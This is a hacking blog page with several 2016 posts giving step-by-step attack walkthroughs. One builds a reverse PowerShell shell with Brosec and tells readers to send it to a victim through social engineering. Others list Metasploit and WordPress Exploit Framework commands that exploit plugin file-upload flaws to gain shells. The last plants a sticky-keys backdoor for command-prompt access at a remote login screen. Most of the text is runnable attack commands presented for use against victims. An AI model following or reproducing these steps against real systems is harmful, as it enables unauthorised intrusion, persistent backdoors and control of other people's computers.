Hack Remote PC with Reverse PowerShell using Brosec

at 7:55 AM Tuesday, June 7, 2016 0 comments
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Firstly install the Brosec tool in your Kali Linux. Follow the below steps one by one:
Reference:

https://github.com/gabemarshall/Brosec

·         apt-get install npm build-essential g++ xsel netcat Install dependencies
·         npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
·         npm install -g n Install n (nodejs version manager)
·         n latest Install latest version of nodejs
·         git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo

·         cd Brosec && npm install - cd into the directory and install npm depdendencies


After that start Brosec by typing in terminal:
./bros
It will show you menu options.


Now set the IP of your localhost :
set lhost 192.168.0.111
Now set the lport :
set lport 4444


After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options Reverse Shells and Exfiltration. Now select option1 Reverse Shells, see the image below:


After choosing the option Reverse Shells, you will see 5 options. In my case I'm selecting option 4 Reverse Shell PSH


Now it will show you a message Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a powershell script, see the below picture.

And copy this code in text editor and save it with .ps1 (powershell extension)



Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get the session of the victim's PC. See the picture below for reference.


Now you can use the systeminfo command to get the information of the victim's PC.

Labels: ,

Penetration Testing in Wordpress Website using Wordpress Exploit Framework

at 5:54 AM Monday, June 6, 2016 0 comments
A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:


https://github.com/rastating/wordpress-exploit-framework.git


now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.


Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /

wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/ refelex_gallery_shell_upload] > run


Labels: ,

Hacking Wordpress using Ninja Forms Unauthenticated File Upload

at 4:36 AM 0 comments
Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

Exploit Targets
ninja forms 2.9.36

Requirement
Attacker: kali Linux
Victim PC: wordpress


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit          

Labels: ,

Hack Wordpress Server using Wordpress SlideShow Gallery Authenticated File Upload

at 7:12 AM Sunday, June 5, 2016 0 comments
The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type.

Exploit Targets
wordpress

Requirement
Attacker: kali Linux
Victim PC: Wordpress


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit (wp_slideshowgallery_upload)>set targeturi /
msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload)>set rport 80
msf exploit (wp_slideshowgallery_upload)>set wp_user user
msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami
msf exploit (wp_slideshowgallery_upload)>exploit          

Labels: ,

Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

at 10:30 AM Monday, May 30, 2016 0 comments
This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

·         Connects to RDP using rdesktop
·         Sends shift 5 times using xdotool to trigger sethc.exe backdoors
·         Sends Windows+u using xdotool to trigger utilman.exe backdoors
·         Takes screenshot
·         Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp
msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit


In Next step replace the sticke key with command prompt using following exploit
msf > use post/windows/manage/stickey_keys
msf post(stickey_keys) > set session 2
msf post(stickey_keys) > exploit


Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git


For scan a single host: ./stickyKeysHunter.sh 192.168.0.120


Now a pop will open like below


Now press shift key 5 times at the login screen now a command prompt will open up


Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

Labels: , ,
Subscribe to: Posts (Atom)